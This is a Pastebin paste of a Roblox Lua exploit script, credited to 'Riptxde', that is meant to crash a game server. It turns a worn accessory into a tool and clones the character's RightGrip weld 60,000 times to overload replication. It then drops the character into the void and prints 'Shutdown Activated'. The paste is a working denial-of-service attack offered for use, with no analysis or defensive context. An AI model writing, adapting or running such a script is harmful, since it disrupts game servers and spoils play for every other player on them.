Advertisement
BlastingStone

Untitled

Mar 26th, 2020
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. --One Accessory Of Any Kind
  2.  
  3. --[[
  4.  
  5. R-Method Crash by Riptxde.
  6. May take up to 30 seconds for effects to show,
  7. Is in effect once all players seem to stop moving.
  8.  
  9. ]]--
  10.  
  11. --/* Locals
  12. local LP = game:GetService('Players').LocalPlayer
  13. if workspace:FindFirstChild(LP.Name) == nil then LP.CharacterAdded:Wait() end
  14. local Char = workspace[LP.Name]
  15. local Hat = Char['Humanoid']:GetAccessories()[1]
  16. local Handle = Hat['Handle']
  17.  
  18. --/* Tool Setup
  19. local Tool = Instance.new("Tool",LP.Backpack)
  20. Tool.Grip = Tool.Grip * CFrame.new(0,-100,0)
  21. Tool.Parent = Char
  22. Handle.Parent = Tool
  23.  
  24. game:GetService('RunService').Stepped:Connect(function()
  25. for _,Part in next, Char:GetChildren() do
  26. if Part:IsA('BasePart') then
  27. Part.CanCollide = false
  28. end
  29. end
  30. end)
  31.  
  32. local HPart; if Char:FindFirstChild('Right Arm') then
  33. HPart = 'Right Arm'
  34. else
  35. HPart = 'RightHand'
  36. end
  37.  
  38. --/* RightGrip Instance Crash
  39. for _ = 1,60000 do
  40. local Grip = Char[HPart].RightGrip:Clone()
  41. Grip.Parent = Char.Humanoid['Status']
  42. end
  43.  
  44. --/* Void Deletion
  45. wait(1) local CPart = Instance.new('Part',workspace)
  46. CPart.CanCollide = false
  47. CPart.Transparency = 1 CPart.Anchored = true
  48. CPart.CFrame = Char['Head'].CFrame
  49. workspace.Camera.CameraSubject = CPart
  50. warn('Shutdown Activated') Char['Humanoid'].Sit = true
  51. local BV = Instance.new('BodyVelocity', Char['HumanoidRootPart'])
  52. BV.MaxForce = Vector3.new(1e5,1e5,1e5)
  53. BV.Velocity = Vector3.new(0,-1e5,0)
  54. BV.P = 1e5
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement